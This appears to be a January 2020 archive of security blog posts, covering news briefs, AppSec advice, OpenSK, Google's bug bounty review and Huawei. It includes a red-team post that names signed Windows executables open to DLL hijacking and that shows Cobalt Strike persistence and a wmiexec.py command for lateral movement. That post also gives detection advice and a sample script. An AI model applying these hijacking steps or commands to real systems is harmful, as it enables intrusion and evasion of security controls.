Monthly Archives: January 2020

Cyber News Rundown: Magecart Hackers Arrested


Indonesian Magecart Hackers Arrested

At least three individuals were arrested in connection to the infamous Magecart information stealing malware. Thanks to the combined efforts of several international law enforcement agencies, numerous servers issuing commands to awaiting Magecart scripts have been taken down in both Indonesia and Singapore. While these are not the only individuals who have profited from the Magecart code, they are the first to be identified and brought to justice.

German City Suffers Cyberattack

The City of Potsdam, Germany, is recovering from a cyberattack that took down parts of its administration systems. Fortunately, the systems were being actively monitored and were quickly taken offline to prevent data from being removed. It seems, after further investigation, that the servers were not fully patched with the latest updates. This could have allowed the attackers to move and execute malware freely.

Job Listings Used to Commit Fraud

A new wave of data theft has hit the job hunting crowd, making life harder for people looking to be hired. Cybercriminals have been creating phony sites with job listings for the purpose of absconding with the information one would normally provide an employer after accepting an offer. Though these types of scams have been executed in the past, they tend to reappear occasionally due to their continued success.

UK Court Freezes Bitcoin Wallet

After falling victim to a ransomware attack that shut down more than 1,000 computers, a Canadian insurance company took advantage of their cybersecurity policy to pay out a nearly $1 million ransom. By working with a cyber analysis firm, the company was able to track their ransom payment through the blockchain to a final wallet, which was then frozen by the currency exchange to stop further transactions and to identify the owners of the wallet. Though this may sound positive for the victims, they may be the target of additional negative repercussions like having their stolen data published or being attacked again.

South Carolina Water Company Shutdown

The Greenville Water service in South Carolina was hit with a cyberattack that took down all their systems for around the last week. As they continue to restore systems to proper function, officials have stated that no customer data was accessed, nor is any payment card data actually stored there. Fortunately, Greenville Water was able to return to normal functions within a week and informed customers that late fees would not be issued for payments made during the outage.

The post Cyber News Rundown: Magecart Hackers Arrested appeared first on Webroot Blog.

Abusing DLL Misconfigurations — Using Threat Intelligence to Weaponize R&D

DLL Abuse Techniques Overview

Dynamic-link library (DLL) side-loading occurs when Windows Side-by-Side (WinSxS) manifests are not explicit about the characteristics of DLLs being loaded by a program. In layman’s terms, DLL side-loading can allow an attacker to trick a program into loading a malicious DLL. If you are interested in learning more about how DLL side-loading works and how we see attackers using this technique, read through our whitepaper.

DLL hijacking occurs when an attacker is able to take advantage of the Windows search and load order, allowing the execution of a malicious DLL, rather than the legitimate DLL.

DLL side-loading and hijacking has been around for years; in fact, FireEye Mandiant was one of the first to discover the DLL side-loading technique along with DLL search order hijacking back in 2010. So why are we still writing a blog about it? Because it’s still a method that works and is used in real world intrusions! FireEye Mandiant still identifies and observes threat groups using DLL abuse techniques during incident response (IR) engagements. There are still plenty of signed executables vulnerable to this, and our red team has weaponized DLL abuse techniques to be part of our methodology. For detection and preventative measures on DLL abuse techniques, see the “Detection and Preventative Measures” section in this blog post.

Even though DLL abuse techniques are not new or cutting edge, this blog post will showcase how the FireEye Mandiant red team uses FireEye Intelligence to expedite the research phase of identifying vulnerable executables, at scale! We will also walk you through how to discover new executables susceptible to DLL abuse and how the FireEye Mandiant red team has weaponized these DLL abuse techniques in its DueDLLigence tool. The DueDLLigence tool was initially released to be a framework for application whitelisting bypasses, but given the nature of unmanaged exports it can be used for DLL abuse techniques as well.

Collecting and Weaponizing FireEye Intelligence

A benefit of being part of the red team at FireEye Mandiant is having access to a tremendous amount of threat intelligence: our organization's incident response and intelligence consultants have observed, documented, and analyzed the actions of attackers across almost every major breach over the past decade. For this project, the FireEye Mandiant red team asked the FireEye Technical Operations and Reverse Engineering Advanced Practices (TORE AP) team to leverage FireEye Intelligence and provide us with all DLL abuse techniques used by attackers that matched the following criteria:

  1. A standalone PE file (.exe file) was used to call a malicious DLL
  2. The .exe must be signed and the certificate not expire within a year
  3. The intelligence about the technique must include the name of the malicious DLL that was called

Once the results were provided to the red team, we started weaponizing the intelligence by taking the approach outlined in the rest of the post, which includes:

  1. Identifying executables susceptible to DLL search order hijacking
  2. Identifying library dependencies for the executable
  3. Satisfying the APIs exported by the library

DLL Search Order Hijacking

In many cases it is possible to execute code within the context of a legitimate Portable Executable (PE) by taking advantage of insecure library references. If a developer allows LoadLibrary to resolve the path of a library dynamically, then that PE will also look in the current directory for the library DLL. This behavior can be used for malicious purposes by copying a legitimate PE to a directory where the attacker has write access. If the attacker creates a custom payload DLL, then the application will load that DLL and execute the attacker's code. This can be beneficial for a red team: the PE may be signed and have the appearance of trust to the endpoint security solution (AV/EDR), it may bypass application whitelisting (AWL), and it can confuse or delay an investigation.

In this section we will look at one example where we identify the conditions for hijacking a PE and implement the requirements in our payload DLL. For this test case we will use a signed binary PotPlayerMini (MD5: f16903b2ff82689404f7d0820f461e5d). This PE was chosen since it has been used by attackers dating back to 2016.

Identifying Library Dependencies

It is possible to determine which libraries and exports a PE requires through static analysis with tools such as IDA or Ghidra. The screenshot shown in Figure 1, for example, shows that PotPlayerMini tries to load a DLL called “PotPlayer.dll”.


Figure 1: Static analysis of DLLs loaded by PotPlayerMini

Where static analysis is not feasible or desirable it may be possible to use a hooking framework such as API Monitor or Frida to profile the LoadLibrary / GetProcAddress behavior of the application.

In Figure 2 we used API Monitor to see this same DLL loading behavior. As you can see, PotPlayerMini is looking for the PotPlayer.dll file in its current directory. At this point, we have validated that PotPlayerMini is susceptible to DLL search order hijacking.


Figure 2: Dynamic analysis of DLLs loaded by PotPlayerMini

Satisfying Exports

After identifying potentially vulnerable library modules we need to apply a similar methodology to identify which exports are required from the module PE. Figure 3 shows a decompiled view from PotPlayerMini highlighting which exports it is looking for within the GetProcAddress functions using static analysis. Figure 4 shows performing this same analysis of exports in the PotPlayerMini application, but using dynamic analysis instead.


Figure 3: Static Analysis of exports in PotPlayerMini DLL


Figure 4: Dynamic Analysis of exports in PotPlayerMini DLL

In our case the payload is a .NET DLL which uses UnmanagedExports so we have to satisfy all export requirements from the binary as shown in Figure 5. This is because the .NET UnmanagedExports library does not support DllMain, since that is an entry point and is not exported. All export requirements need to be satisfied to ensure the DLL has all the functions exported which the program accesses via GetProcAddress or import address table (IAT). These export methods will match those that were observed in the static and dynamic analysis. This may require some trial and error depending on the validation that is present in the binary.


Figure 5: Adding export requirements in .NET DLL

Once we execute the binary, we can see that it successfully executes our function as shown in Figure 6.


Figure 6: Executing binary susceptible to DLL abuse

DLL Hijacking Without Satisfying All Exports

When writing a payload DLL in C/C++ it is possible to hijack control flow in DllMain. When doing this it is not necessary to enumerate and satisfy all needed exports as previously described. There also may be cases where the DLL does not have any exports and can only be hijacked via the DllMain entry point.

An example of this can be shown with the Windows Media Player Folder Sharing executable called wmpshare.exe. You can copy the executable to a directory out of its original location (C:\Program Files (x86)\Windows Media Player) and perform dynamic analysis using API Monitor. In Figure 7, you can see that the wmpshare.exe program uses the LoadLibraryW method to load the wmp.dll file, but does not specify an explicit path to the DLL. When this happens, the LoadLibraryW method will first search the directory in which the process was created (present working directory). Full details on the search order used can be found in the LoadLibraryW documentation and the CreateProcess documentation.


Figure 7: Viewing LoadLibrary calls in wmpshare.exe

Since it does not specify an explicit path, you can test if it can be susceptible to DLL hijacking by creating a blank file named “wmp.dll” and copying it to the same directory as the wmpshare.exe file. Now when running the wmpshare executable in API Monitor, you can see it is first checking in its current directory for the wmp.dll file, shown in Figure 8. Therefore, it is possible to use this binary for DLL hijacking.


Figure 8: Viewing LoadLibrary calls in wmpshare.exe with dummy dll present

Figure 9 shows using the wmpshare executable in a weaponized manner to take advantage of the DllMain entry point with a DLL created in C++.


Figure 9: Using the DllMain entry point

Discovering New Executables Susceptible to DLL Abuse

In addition to weaponizing the FireEye intelligence of the executables used for DLL abuse by attackers, the FireEye Mandiant red team performed research to discover new executables susceptible to abuse by targeting Windows system utilities and third-party applications.

Windows System Utilities

The FireEye Mandiant red team used the methodology previously described in the Collecting and Weaponizing FireEye Intelligence section to look at Windows system utilities present in the C:\Windows\System32 directory that were susceptible to DLL abuse techniques. One of the system utilities found was the deployment image servicing and management (DISM) utility (Dism.exe). When performing dynamic analysis of this system utility, it was observed that it was attempting to load the DismCore.dll file in the current directory as shown in Figure 10.


Figure 10: Performing dynamic analysis of Dism utility

Next, we loaded the DISM system utility into API Monitor from its normal path (C:\Windows\System32) in order to see the required exports as shown in Figure 11.


Figure 11: Required exports for DismCore.dll

The code shown in Figure 12 was added to DueDLLigence to validate that the DLL was vulnerable and could be run successfully using the DISM system utility.


Figure 12: Dism export method added to DueDLLigence

Third-Party Applications

The FireEye Mandiant red team also targeted executable files associated with common third-party applications that could be susceptible to DLL abuse. One of the executable files discovered was a Tortoise SVN utility (SubWCRev.exe). When performing dynamic analysis of this Tortoise SVN utility, it was observed that it was attempting to load crshhndl.dll in the current directory. The export methods are shown in Figure 13.


Figure 13: Performing dynamic analysis of SubWCRev.exe

The code shown in Figure 14 was added to DueDLLigence to validate that the DLL was vulnerable and could be run successfully using the Tortoise SVN utility.


Figure 14: SubWCRev.exe export methods added to DueDLLigence

Applying It to the Red Team

Having a standalone trusted executable allows the red team to simply copy the trusted executable and malicious DLL to a victim machine and bypass various host-based security controls, including application whitelisting. Once the trusted executable (vulnerable to DLL abuse) and malicious DLL are both in the same present working directory, the executable will call the corresponding DLL within the same directory. This method can be used in multiple phases of the attack lifecycle as payload implants, including phases such as establishing persistence and performing lateral movement.

Persistence

In this example, we will be using the Windows system utility Dism.exe discovered in the Windows System Utilities section as our executable, along with a DLL generated by DueDLLigence in conjunction with SharPersist to establish persistence on a target system. First, the DISM system utility and malicious DLL are uploaded to the target system as shown in Figure 15.


Figure 15: Uploading payload files

Then we use SharPersist to add startup folder persistence, which uses our DISM system utility and associated DLL as shown in Figure 16.


Figure 16: Adding startup folder persistence with SharPersist

After the target machine has been rebooted and the targeted user has logged on, Figure 17 shows our Cobalt Strike C2 server receiving a beacon callback from our startup folder persistence where we are living in the Dism.exe process.


Figure 17: Successful persistence callback

Lateral Movement

We will continue using the same DISM system utility and DLL file for lateral movement. The HOGWARTS\adumbledore user has administrative access to the remote host 192.168.1.101 in this example. We transfer the DISM system utility and the associated DLL file via the SMB protocol to the remote host as shown in Figure 18.


Figure 18: Transferring payload files to remote host via SMB

Then we set up a SOCKS proxy in our initial beacon, and use Impacket's wmiexec.py to execute our payload via the Windows Management Instrumentation (WMI) protocol, as shown in Figure 19 and Figure 20.

proxychains python wmiexec.py -nooutput DOMAIN/user:password:@x.x.x.x C:\\Temp\\Dism.exe

Figure 19: Executing payload via WMI with Impacket’s wmiexec.py


Figure 20: Output of executing command shown in Figure 19

We receive a beacon from the remote host, shown in Figure 21, after executing the DISM system utility via WMI.


Figure 21: Obtaining beacon on remote host

Detection and Preventative Measures

Detailed prevention and detection methods for DLL side-loading are well documented in the whitepaper and mentioned in the DLL Abuse Techniques Overview. The whitepaper breaks it down into preventative measures at the software development level and goes into recommendations for the endpoint user level. A few detection methods that are not mentioned in the whitepaper include:

  • Checking for processes that have unusual network connectivity
    • If you have created a baseline of normal process network activity, and the network activity for a given process diverges from that baseline, it is possible that the process has been compromised.
  • DLL whitelisting
    • Track the hashes of DLLs used on systems to identify discrepancies.
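As an added example (not FireEye's code and not part of the original post), the following Python script applies both detection ideas to constructed Sysmon-style events: it tracks expected hashes and install locations for DLLs named in this post, flags a tracked executable such as Dism.exe running from outside its normal directory (the copy-to-a-writable-directory step described earlier), and flags connections from processes absent from a network baseline. The baseline directories, hashes, destination hosts and the event layout are all assumptions made for the example.

```python
"""DLL whitelisting and per-process network baselining over constructed events."""
from __future__ import annotations
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class Alert:
    rule: str
    process: str
    detail: str


# Constructed baselines. In practice the hashes come from a clean reference
# build and the network set from observing normal process behaviour over time.
# Expected SHA-256 (placeholder values) and install directory (assumed) for the
# DLLs this post shows being targeted.
DLL_BASELINE = {
    "dismcore.dll": ("11" * 32, r"C:\Windows\System32\Dism"),
    "wmp.dll": ("22" * 32, r"C:\Windows\System32"),
    "crshhndl.dll": ("33" * 32, r"C:\Program Files\TortoiseSVN\bin"),
}
# Directories (assumed) that each signed executable is expected to run from.
EXE_BASELINE = {
    "dism.exe": {r"C:\Windows\System32"},
    "wmpshare.exe": {r"C:\Program Files (x86)\Windows Media Player"},
    "subwcrev.exe": {r"C:\Program Files\TortoiseSVN\bin"},
}
# Process names seen making outbound connections during the baseline period.
NET_BASELINE = {"chrome.exe", "outlook.exe", "svchost.exe"}


def _same_dir(a: PureWindowsPath, b: str) -> bool:
    return str(a).lower() == b.lower()


def check_image_load(ev: dict) -> list[Alert]:
    """Image-load event: which process loaded which DLL, and the DLL's hash."""
    proc = PureWindowsPath(ev["process"])
    dll = PureWindowsPath(ev["image"])
    alerts: list[Alert] = []

    # Rule 1: a known executable running outside its normal directory. Copying a
    # signed binary next to a payload DLL is the first step of the technique.
    expected = EXE_BASELINE.get(proc.name.lower())
    if expected and not any(_same_dir(proc.parent, d) for d in expected):
        alerts.append(Alert("exe_relocated", ev["process"],
                            f"started from {proc.parent}"))

    base = DLL_BASELINE.get(dll.name.lower())
    if base:
        good_hash, good_dir = base
        # Rule 2: DLL whitelisting - the hash of a tracked DLL does not match.
        if ev["sha256"].lower() != good_hash:
            alerts.append(Alert("dll_hash_mismatch", ev["process"],
                                f"{dll.name} sha256={ev['sha256'][:12]}..."))
        # Rule 3: a tracked DLL loaded from somewhere other than its install location.
        if not _same_dir(dll.parent, good_dir):
            alerts.append(Alert("dll_unexpected_path", ev["process"],
                                f"{dll.name} loaded from {dll.parent}"))
    return alerts


def check_network(ev: dict) -> list[Alert]:
    """Network event: flag processes with no history of connecting outbound."""
    proc = PureWindowsPath(ev["process"])
    if proc.name.lower() in NET_BASELINE:
        return []
    return [Alert("unbaselined_network", ev["process"], f"connected to {ev['dest']}")]


def analyze(events: list[dict]) -> list[Alert]:
    alerts: list[Alert] = []
    for ev in events:
        if ev["type"] == "image_load":
            alerts.extend(check_image_load(ev))
        elif ev["type"] == "network":
            alerts.extend(check_network(ev))
    return alerts


# Constructed sample events: a legitimate Dism.exe run, then a relocated copy
# loading a DLL dropped beside it and connecting out, as in the persistence
# example above. Hashes and destination addresses are placeholders.
SAMPLE_EVENTS = [
    {"type": "image_load", "process": r"C:\Windows\System32\Dism.exe",
     "image": r"C:\Windows\System32\Dism\DismCore.dll", "sha256": "11" * 32},
    {"type": "image_load", "process": r"C:\Temp\Dism.exe",
     "image": r"C:\Temp\DismCore.dll", "sha256": "ab" * 32},
    {"type": "network", "process": r"C:\Temp\Dism.exe", "dest": "203.0.113.10:443"},
    {"type": "network", "dest": "203.0.113.20:443",
     "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.process}: {a.detail}")
```

The legitimate run produces no alerts, while the relocated copy trips all three image-load rules before its outbound connection trips the network rule.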

These detection methods are difficult to implement at scale, but possible to utilize. That is exactly why this old technique is still valid and used by modern red teams and threat groups. The real problem that allows this vulnerability to continue to exist has to do with software publishers. Software publishers need to be aware of DLL abuse techniques and know how to prevent such vulnerabilities from being developed into products (e.g. by implementing the mitigations discussed in our whitepaper). Applying these recommendations will reduce the DLL abuse opportunities attackers use to bypass several modern-day detection techniques.

Microsoft has provided some great resources on DLL security and triaging a DLL hijacking vulnerability.

Conclusion

Threat intelligence provides immense value to red teamers who are looking to perform offensive research and development and emulate real-life attackers. By looking at what real attackers are doing, a red teamer can glean inspiration for future tooling or TTPs.

DLL abuse techniques can be helpful from an evasion standpoint in multiple phases of the attack lifecycle, such as persistence and lateral movement. There will continue to be more executables discovered that are susceptible to DLL abuse and used by security professionals and adversaries alike.

Best Practices and Practical Steps to Guide Your AppSec Journey

Imagine that you are tasked with planning a vacation for you and your family. For your ideal trip, you would jet off to a five-star resort on a private island for a month of pampering and fine dining. But, since you have two children, a limited budget, and only one week of paid time off, you settle for a three-star, theme park resort with a spa and outdoor pool. Your family has a great time on the vacation and, using your new-found trip planning skills, you start preparing and saving for your dream getaway.

Spearheading an application security (AppSec) program can sometimes feel a little like that type of vacation planning: you can see an ideal state, but it can feel unattainable. Just like planning a vacation, creating an AppSec program is also dependent on time and money, as well as an organization's staff expertise, culture, and executive support.

Below, we look at both the best practices, and some practical first steps you can take that will prepare your AppSec program for improvements in the future. In other words, keep your eye on the private island AppSec, while moving forward with the theme park AppSec.

Best Practice #1: Use More Than One Application Security Testing Type

When you visit the doctor with an ailment, you undergo several tests to determine the diagnosis. There is no magic test that detects all illnesses. The same goes for AppSec tests: there is no one test that detects every vulnerability. So, to make sure that your application is fully secure, the best practice is to use as many testing types as possible.

Practical Advice: Start with What Makes the Most Sense, Then Add More Later

Develop an AppSec strategy to determine where you need AppSec solutions the most. Start by implementing the tests that will have the most impact, in the shortest amount of time, for the least amount of money. From there, you can start adding on more tests.

There are several factors that will help determine which tests will have the most impact. For example, if you have multiple applications, rank the applications based on the criticality of their risks, and test the applications with the most critical risks first. Another thing to consider is programming languages. If you leverage less-mainstream programming languages, there are limitations regarding the AppSec tests you can use. So start with tests that are not specific to language, like dynamic or penetration testing.

Best Practice #2: Shift Security Left

In today's fast-paced world, enterprises are moving from yearly product releases to monthly, weekly, or daily releases. To keep up with this change, security testing needs to be woven into the development cycle instead of after the development cycle. That way, when it is time to release the product, security testing will not stand in the way.

Practical Advice: Shift Security Culture Left

Moving security testing into the development cycle means that developers will play a bigger security role. Since most development and security teams have never worked together, "shifting security left" can be a significant cultural change.

Before making this change, a good first step is to help security understand how development works and to build a relationship. Understanding how development works involves learning their tools and process, as well as how they build software, so that security testing can be integrated organically. When security is organically woven into the development process, developers are more likely to be receptive to security, making it easier to forge trusting relationships.

You should also look for ways to automate security testing into the CI/CD pipeline. By integrating automated security tools into the CI/CD pipeline, you can incorporate testing without handing off code to another team, making it easier for developers to fix issues immediately.

Best Practice #3: Fix Everything Fast

Finding vulnerabilities is only half of the battle. You need to have a solid plan in place to fix them once they are discovered. Automating security testing in CI/CD pipelines allows organizations to not only find flaws faster, but it also speeds up the remediation process.

Practical Advice: Prioritize Fixes While Creating Fewer Vulnerabilities

As much as we would love to fix all flaws instantaneously, it is not possible. A practical first step in remediation is prioritizing. When prioritizing your flaws, do not just concentrate on defect severity, also consider the criticality of the application and how easy it would be to exploit the flaw.

Best Practice #4: Embed Security Champions into Development Teams

Most developers do not have a security background. This makes it very challenging when you try to implement security tests in the development lifecycle. A way to help fill this knowledge gap is to select interested volunteers from the development teams to become security champions. Security champions learn about security testing and can reiterate important security messages back to their teams.

Practical Advice: Build Up Your Security Champions' Capabilities

Building a team of security champions takes time. Start by making sure your organization's security, development, and leadership teams are all on board with the security champions concept. Once everyone agrees with the idea, help the security and development teams build a relationship. If developers and security personnel are on good terms, you have a much better chance of developers agreeing to become security champions.

Next, identify your champions. Security champions should be selected based on a demonstrated or perceived interest in learning more about security. If you select developers who do not have an interest in security, there is a high probability that they will not be successful in the role. Lastly, nurture your identified champions by giving them the appropriate tools and support needed for success, like additional training in security concepts and code reviews.

Best Practice #5: Measure Your AppSec Results

It's critical to be able to measure and report on the success of an AppSec program in metrics. Identify which metrics are most important to your organization's key decision-makers, then display the metrics in an easy-to-understand, actionable manner.

Practical Advice: Focus on Your Policy Metric

Bringing too many metrics to your executives early on can be overwhelming and, quite frankly, unnecessary. Start by presenting one metric: how your AppSec program is complying with your internal AppSec policy. From here, you can start sharing other valuable metrics.

Remember, just like saving for your dream getaway, creating the perfect AppSec program takes time. But taking practical steps and looking toward the big picture will help you get closer to perfect sooner.

Learn more about the steps you can take to achieve AppSec maturity in our recent guide, Application Security Best Practices vs. Practicalities: What to Strive for and Where to Start.

Jeff Bezos met FBI investigators in 2019 over alleged Saudi hack

Amazon founder interviewed as FBI conducts inquiry into Israeli firm linked to malware

Jeff Bezos met federal investigators in April 2019 after they received information about the alleged hack of the billionaire’s mobile phone by Saudi Arabia, the Guardian has been told.

Bezos was interviewed by investigators at a time when the FBI was conducting an investigation into the Israeli technology company NSO Group, according to a person who was present at the meeting.


Weekly Update 176

Well that's the audio issues fixed - mostly. The Zoom H6 is an awesome recorder, I just can't quite work out the right adaptors for the mic. I've got a couple of Saramonic SR-XLM1 lav mics and the guy at the DJ store I bought the Zoom from was convinced we'd be fine with just 3.5mm to 6.35mm jack converters, which appears to be incorrect. Someone else then said we'd need a TRRS to TRS adaptor so we grabbed a couple of Rode SC3s which also didn't solve the problem. So, keeping in mind we have no idea what we're doing (and missing), can someone explain the gap here and what's required to fill it?

In other news, we're at the tail end of NDC London where we've wrapped up our individual and joint talks. Scott's talking a lot about the history of crypto and where we now are with SSL Labs changing ratings when older TLS versions are found and browsers deprecating support for them. Oh - and incidentally, Cloudflare does enable you to no longer support older versions of TLS and I've had my things set at a minimum of 1.2 for quite some time now. I'm back on the plane to Aus in just a few hours' time so the next update will be from somewhere sunny - with good audio!

References

  1. SSL Labs is changing the grade for websites still supporting TLS 1.0 or 1.1 (this'll cap a bunch of sites rating well today at "B" once it hits)
  2. The DHS cyber chief uses Have I Been Pwned to monitor his breach exposure (it's always cool to see use cases like this 😎)
  3. Legacy TLS is being deprecated in the browsers (that's Scott's latest blog post, interesting reading if you're not supporting new versions of TLS)
  4. Scott played "hand model" whilst the BBC filmed his implant (clip there from when he got it fitted)
  5. Sponsored by: SecurityFWD. A brand new YouTube show from Varonis. Watch Episode 1: How Far can Wi-Fi Travel?

Say hello to OpenSK: a fully open-source security key implementation

Today, FIDO security keys are reshaping the way online accounts are protected by providing an easy, phishing-resistant form of two-factor authentication (2FA) that is trusted by a growing number of websites, including Google, social networks, cloud providers, and many others. To help advance and improve access to FIDO authenticator implementations, we are excited, following other open-source projects like Solo and Somu, to announce the release of OpenSK, an open-source implementation for security keys written in Rust that supports both FIDO U2F and FIDO2 standards.

Photo of OpenSK developer edition: a Nordic Dongle running the OpenSK firmware on DIY case

By opening up OpenSK as a research platform, our hope is that it will be used by researchers, security key manufacturers, and enthusiasts to help develop innovative features and accelerate security key adoption.

With this early release of OpenSK, you can make your own developer key by flashing the OpenSK firmware on a Nordic chip dongle. In addition to being affordable, we chose Nordic as initial reference hardware because it supports all major transport protocols mentioned by FIDO2: NFC, Bluetooth Low Energy, USB, and a dedicated hardware crypto core. To protect and carry your key, we are also providing a custom, 3D-printable case that works on a variety of printers.

“We’re excited to collaborate with Google and the open source community on the new OpenSK research platform,” said Kjetil Holstad, Director of Product Management at Nordic Semiconductor. “We hope that our industry leading nRF52840’s native support for secure cryptographic acceleration combined with new features and testing in OpenSK will help the industry gain mainstream adoption of security keys.”

While you can make your own fully functional FIDO authenticator today, as showcased in the video above, this release should be considered as an experimental research project to be used for testing and research purposes.

Under the hood, OpenSK is written in Rust and runs on TockOS to provide better isolation and cleaner OS abstractions in support of security. Rust's strong memory safety and zero-cost abstractions make the code less vulnerable to logical attacks. TockOS, with its sandboxed architecture, offers the isolation between the security key applet, the drivers, and the kernel that is needed to build defense in depth. Our TockOS contributions, including our flash-friendly storage system and patches, have all been upstreamed to the TockOS repository. We've done this to encourage everyone to build upon the work.


How to get involved and contribute to OpenSK

To learn more about OpenSK and how to experiment with making your own security key, you can check out our GitHub repository today. With the help of the research and developer communities, we hope OpenSK over time will bring innovative features, stronger embedded crypto, and encourage widespread adoption of trusted phishing-resistant tokens and a passwordless web.

Acknowledgements

We also want to thank our OpenSK collaborators: Adam Langley, Alexei Czeskis, Arnar Birgisson, Borbala Benko, Christiaan Brand, Dirk Balfanz, Dominic Rizzo, Fabian Kaczmarczyck, Guillaume Endignoux, Jeff Hodges, Julien Cretin, Mark Risher, Oxana Comanescu, Tadek Pietraszek

NICE Webinar: Learning Principles for Cybersecurity Practice

The PowerPoint slides used during this webinar can be downloaded here.

Speakers:

  • Craig Jackson, Program Director, Indiana University's Center for Applied Cybersecurity Research
  • Scott Russell, Senior Policy Analyst, Indiana University's Center for Applied Cybersecurity Research
  • Susan Sons, Chief Security Analyst, Indiana University's Center for Applied Cybersecurity Research

Synopsis: The NICE Cybersecurity Workforce Framework includes a few knowledge statements that are common for all work roles, including "Knowledge of cybersecurity and privacy principles." What are the "cybersecurity principles

What Software Composition Analysis and Your Dentist Have in Common

SAST, DAST, IAST, SCA… confused about the differences? We thought it might be helpful to clear things up by using the analogy of human health. When you visit the doctor with an ailment, or even for a routine checkup, you are likely to undergo a series of tests to find potential health conditions or diseases. Since the tests are targeting different parts of the mind or body, the results may vary. So, the more tests performed, the better the chances of discovering and treating an illness. The same logic applies to security health. The more application security tests performed, the better the odds are that you will find and remediate security flaws or vulnerabilities.

Now that we understand the importance of the application security tests, and we know that they are looking for different vulnerabilities and flaws, how can we distinguish between them? We will continue with the human health analogy, comparing AppSec tests to common, easy-to-understand health tests.

Static analysis

Make no bones about it, static analysis is very similar to an X-ray. Just like X-rays, which produce a static image to find torn and broken bones, static analysis evaluates an application from the inside out, reviewing stationary code for security vulnerabilities. By catching the vulnerabilities before running the application, developers can fix flaws in a timely, cost-efficient manner.

Dynamic analysis

Dynamic analysis is comparable to a reflex test. During a reflex test, the doctor taps a tendon to make sure that the patient’s motor and sensory skills are intact. Dynamic analysis takes a similar outside-in approach, poking and prodding at the running application to find vulnerabilities.

Software composition analysis

For software composition analysis (SCA), think of a dental exam. During a dental exam, any fillings you have are inspected. Although fillings are not an organic part of the body, faulty dental fillings, if undetected and untreated, can lead to serious illness. Software composition analysis works the same way: SCA inspects open source code for vulnerabilities. This is code that you didn't write yourself, but it still affects the security and health of the application. Even though open source is a third-party component, vulnerabilities that go undetected in it are nothing to smile about.

Interactive analysis

Interactive analysis can best be compared to an electrocardiography (EKG) exam. In an EKG, a doctor places electrodes on your chest to measure your heart rate. The doctor might have you exercise while conducting the EKG to evaluate your heart under stress. With interactive analysis, you place an agent in the runtime environment and put the application under load. From there, you can see what vulnerabilities the agent discovers.

Penetration test

A penetration test is the equivalent of a doctor’s personal assessment. When you visit the doctor and describe your symptoms, the doctor uses their expertise to provide a diagnosis. It is not unusual for the doctor to pick up on an illness that no exam detects. Similarly, in a penetration test, an expert penetration tester simulates an attack on the application to find vulnerabilities that are often missed by other, more automated methods.

So, the next time you visit the doctor and undergo several tests, remember that each test holds a purpose. And when it is time to evaluate your AppSec program, remember that the same logic holds true. The more security tests you are able to perform, the better the chances of catching vulnerabilities.

Learn More

Get more details on the strengths and weaknesses of the different AppSec testing types in our recent guide, Application Security Best Practices vs. Practicalities: What to Strive for and Where to Start.

Computer-Based Training: 2019 in Review

Software security is no longer just about writing secure code. Everyone who provisions, operates, analyzes, or defends software systems needs job-specific guidance. That’s why we’ve taken a role-based approach, following guidance provided by resources like the NICE Framework – making it easy to acquire appropriate training for your teams.

Vulnerability Reward Program: 2019 Year in Review

Our Vulnerability Reward Programs were created to reward researchers for protecting users by telling us about the security bugs they find. Their discoveries help keep our users, and the internet at large, safe. We look forward to even more collaboration in 2020 and beyond.

2019 has been another record-breaking year for us, thanks to our researchers! We paid out over $6.5 million in rewards, doubling what we’ve ever paid in a single year. At the same time our researchers decided to donate an all-time-high of $500,000 to charity this year. That’s 5x the amount we have ever previously donated in a single year. Thanks so much for your hard work and generous giving!
Since 2010, we have expanded our VRPs to cover additional Google product areas, including Chrome, Android, and most recently Abuse. We've also expanded to cover popular third party apps on Google Play, helping identify and disclose vulnerabilities to impacted app developers. Since then we have paid out more than $21 million in rewards*. As we have done in years past, we are sharing our 2019 Year in Review across these programs.

What’s changed in the past year?

  • Chrome’s VRP increased its reward payouts by tripling the maximum baseline reward amount from $5,000 to $15,000 and doubling the maximum reward amount for high quality reports from $15,000 to $30,000. The additional bonus given to bugs found by fuzzers running under the Chrome Fuzzer Program is also doubling to $1,000. More details can be found in their program rules page.
  • Android Security Rewards expanded its program with new exploit categories and higher rewards. The top prize is now $1 million for a full chain remote code execution exploit with persistence which compromises the Titan M secure element on Pixel devices. And if you achieve that exploit on specific developer preview versions of Android, we’re adding in a 50% bonus, making the top prize $1.5 million. See our program rules page for more details around our new exploit categories and rewards.
  • Abuse VRP engaged in outreach and education to increase researchers’ awareness of the program, presenting an overview of our Abuse program in Australia, Malaysia, Vietnam, the UK and the US.
  • The Google Play Security Reward Program expanded scope to any app with over 100 million installs, resulting in over $650,000 in rewards in the second half of 2019.
  • The Developer Data Protection Reward Program was launched in 2019 to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions.
We also had the goal of increasing engagement with our security researchers over the last year at events such as BountyCon in Singapore and ESCAL8 in London. These events not only allow us to get to know each of our bug hunters but also provide a space for bug hunters to meet one another and hopefully work together on future exploits.

A hearty thank you to everyone that contributed to the VRPs in 2019. We are looking forward to increasing engagement even more in 2020 as both Google and Chrome VRPs will turn 10. Stay tuned for celebrations. Follow us on @GoogleVRP

*The total amount was updated on January 28; it previously said we paid out more than $15 million in rewards.

Huawei set for limited UK 5G role, but can we Trust Huawei?

Today the UK Government decided Huawei can be allowed to help build the UK's 5G network, but it remains banned from supplying kit to "sensitive parts" of the core network. The Prime Minister, Boris Johnson, made the long-awaited decision, ending months of uncertainty for the Chinese telecoms giant.

The PM had briefed US President Donald Trump about the decision. Trump has been very vocal on his stance, exclaiming, “we are not going to do business with Huawei”, and the Trump administration is reportedly nearing publication of a rule that could further block shipments of US-made goods to Huawei. The Trump administration has said it 'is disappointed' with the UK government's decision. China had warned the UK there could be "substantial" repercussions for other trade and investment plans had the company been banned outright.

There was ferocious debate in the UK parliament after the government announcement, with MPs calling into question the cybersecurity risks which could prevail – the US says the cybersecurity risks are severe, the UK’s security services say they can be managed, whereas Australia has opted for an outright ban. There’s a clear disconnect, and today's decision could cause turmoil in the US/UK working relationship that could ultimately impact a post-Brexit trade deal.

Can Huawei be trusted, or will using its equipment leave communication networks, and our own mobile phones, vulnerable? The US says Huawei is a security risk, given the firm is heavily state supported and is run by Mr Ren, who served in the Chinese military. Huawei 5G equipment could be used for spying and for negatively impacting critical national infrastructure.

